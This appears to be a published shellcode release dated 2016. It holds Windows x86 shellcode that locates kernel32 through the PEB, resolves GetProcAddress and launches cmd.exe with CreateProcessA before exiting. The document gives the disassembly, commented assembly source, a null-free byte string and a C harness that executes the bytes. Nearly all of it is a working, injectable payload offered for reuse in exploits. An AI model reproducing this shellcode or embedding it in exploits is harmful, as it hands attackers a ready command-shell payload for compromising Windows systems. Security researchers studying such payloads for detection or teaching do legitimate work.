/* # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode # Author : Roziul Hasan Khan Shifat # Date : 15-08-2016 # Tested On : Windows 7 x86 */ /* Disassembly of section .text: 00000000 <_start>: 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 48 10 mov 0x10(%eax),%ecx 12: 31 db xor %ebx,%ebx 14: 8b 59 3c mov 0x3c(%ecx),%ebx 17: 01 cb add %ecx,%ebx 19: 8b 5b 78 mov 0x78(%ebx),%ebx 1c: 01 cb add %ecx,%ebx 1e: 8b 73 20 mov 0x20(%ebx),%esi 21: 01 ce add %ecx,%esi 23: 31 d2 xor %edx,%edx 00000025 : 25: 42 inc %edx 26: ad lods %ds:(%esi),%eax 27: 01 c8 add %ecx,%eax 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 2f: 75 f4 jne 25 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 38: 75 eb jne 25 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 41: 75 e2 jne 25 43: 8b 73 1c mov 0x1c(%ebx),%esi 46: 01 ce add %ecx,%esi 48: 8b 14 96 mov (%esi,%edx,4),%edx 4b: 01 ca add %ecx,%edx 4d: 89 d6 mov %edx,%esi 4f: 89 cf mov %ecx,%edi 51: 31 db xor %ebx,%ebx 53: 68 79 41 41 41 push $0x41414179 58: 66 89 5c 24 01 mov %bx,0x1(%esp) 5d: 68 65 6d 6f 72 push $0x726f6d65 62: 68 65 72 6f 4d push $0x4d6f7265 67: 68 52 74 6c 5a push $0x5a6c7452 6c: 54 push %esp 6d: 51 push %ecx 6e: ff d2 call *%edx 70: 83 c4 10 add $0x10,%esp 73: 31 c9 xor %ecx,%ecx 75: 89 ca mov %ecx,%edx 77: b2 54 mov $0x54,%dl 79: 51 push %ecx 7a: 83 ec 54 sub $0x54,%esp 7d: 8d 0c 24 lea (%esp),%ecx 80: 51 push %ecx 81: 52 push %edx 82: 51 push %ecx 83: ff d0 call *%eax 85: 59 pop %ecx 86: 31 d2 xor %edx,%edx 88: 68 73 41 42 42 push $0x42424173 8d: 66 89 54 24 02 mov %dx,0x2(%esp) 92: 68 6f 63 65 73 push $0x7365636f 97: 68 74 65 50 72 push $0x72506574 9c: 68 43 72 65 61 push $0x61657243 a1: 8d 14 24 lea (%esp),%edx a4: 51 push %ecx a5: 52 push %edx a6: 57 push %edi a7: ff d6 call *%esi a9: 59 pop %ecx aa: 83 c4 10 add $0x10,%esp ad: 31 db xor %ebx,%ebx af: 68 65 78 65 41 push $0x41657865 b4: 88 5c 24 03 mov %bl,0x3(%esp) b8: 68 63 6d 64 2e push $0x2e646d63 bd: 8d 1c 24 lea (%esp),%ebx c0: 31 d2 xor %edx,%edx c2: b2 44 mov $0x44,%dl c4: 89 11 mov %edx,(%ecx) c6: 8d 51 44 lea 0x44(%ecx),%edx c9: 56 push %esi ca: 31 f6 xor %esi,%esi cc: 52 push %edx cd: 51 push %ecx ce: 56 push %esi cf: 56 push %esi d0: 56 push %esi d1: 56 push %esi d2: 56 push %esi d3: 56 push %esi d4: 53 push %ebx d5: 56 push %esi d6: ff d0 call *%eax d8: 5e pop %esi d9: 83 c4 08 add $0x8,%esp dc: 31 db xor %ebx,%ebx de: 68 65 73 73 41 push $0x41737365 e3: 88 5c 24 03 mov %bl,0x3(%esp) e7: 68 50 72 6f 63 push $0x636f7250 ec: 68 45 78 69 74 push $0x74697845 f1: 8d 1c 24 lea (%esp),%ebx f4: 53 push %ebx f5: 57 push %edi f6: ff d6 call *%esi f8: 31 c9 xor %ecx,%ecx fa: 51 push %ecx fb: ff d0 call *%eax */ /* section .text global _start _start: xor ecx,ecx mov eax,[fs:ecx+0x30] ;PEB mov eax,[eax+0xc] ;PEB->ldr mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList lodsd xchg esi,eax lodsd mov ecx,[eax+0x10] ;kernel32 base address xor ebx,ebx mov ebx,[ecx+0x3c] ;DOS->elf_anew add ebx,ecx ;PE HEADER mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress add ebx,ecx ;IMAGE_EXPORT_DIRECTORY mov esi,[ebx+0x20] ;AddressOfNames add esi,ecx ;--------------------------------------------- xor edx,edx func: inc edx lodsd add eax,ecx cmp dword [eax],'GetP' jnz func cmp dword [eax+4],'rocA' jnz func cmp dword [eax+8],'ddre' jnz func ;-------------------------------- mov esi,[ebx+0x1c] ;AddressOfFunctions add esi,ecx mov edx,[esi+edx*4] add edx,ecx ;GetProcAddress() ;------------------------------------- mov esi,edx mov edi,ecx ;------------------------- xor ebx,ebx ;finding address of RtlZeroMemory() push 0x41414179 mov [esp+1],word bx push 0x726f6d65 push 0x4d6f7265 push 0x5a6c7452 push esp push ecx call edx ;------------------------------ add esp,16 ;----------------------------------- ;zero out 84 bytes xor ecx,ecx mov edx,ecx mov dl,84 push ecx sub esp,84 lea ecx,[esp] push ecx push edx push ecx call eax ;---------------------------- ;finding address of CreateProcessA() pop ecx xor edx,edx push 0x42424173 mov [esp+2],word dx push 0x7365636f push 0x72506574 push 0x61657243 lea edx,[esp] push ecx push edx push edi call esi ;-------------------------------- ;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) pop ecx add esp,16 xor ebx,ebx push 0x41657865 mov [esp+3],byte bl push 0x2e646d63 lea ebx,[esp] xor edx,edx mov dl,68 mov [ecx],edx lea edx,[ecx+68] push esi ; xor esi,esi push edx push ecx push esi push esi push esi push esi push esi push esi push ebx push esi call eax pop esi ;------------------------------------- ;finding address of ExitProcess() add esp,8 xor ebx,ebx push 0x41737365 mov [esp+3],byte bl push 0x636f7250 push 0x74697845 lea ebx,[esp] push ebx push edi call esi xor ecx,ecx push ecx call eax */ #include #include char shellcode[]=\ "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0"; main() { printf("shellcode lenght %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); }